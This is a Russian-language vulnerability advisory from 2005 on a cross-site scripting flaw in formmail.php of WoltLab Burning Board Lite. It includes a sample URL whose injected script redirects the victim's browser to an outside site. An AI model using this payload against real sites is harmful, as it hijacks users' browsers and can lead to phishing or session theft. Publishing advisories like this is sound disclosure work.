Межсайтовый скриптинг в Woltlab Burning Board Lite

Дата публикации:13.01.2005
Всего просмотров:1817
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: WoltLab Burning Board Lite 1.x
Уязвимые версии: Woltlab Burning Board Lite1.0.0, 1.0.1e

Описание:
Обнаружена уязвимость в Woltlab Burning Board Lite, которая позволяет злоумышленнику выполнить XSS нападение на целевого пользователя.

Уязвимость обнаружена в сценарии 'formmail.php' из-за некорректной обработки данных в параметре 'userid'. Злоумышленник может создать специально сформированный URL, который выполнить произвольный HTML сценарий в браузере жертвы.

Пример/Эксплоит:

http://website/board/formmail.php?userid=1">
<script>document.location.href="http://www.it-security23.net
";</script x="y

URL производителя: http://www.woltlab.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Woltlab Burning Board Lite formmail.php XSS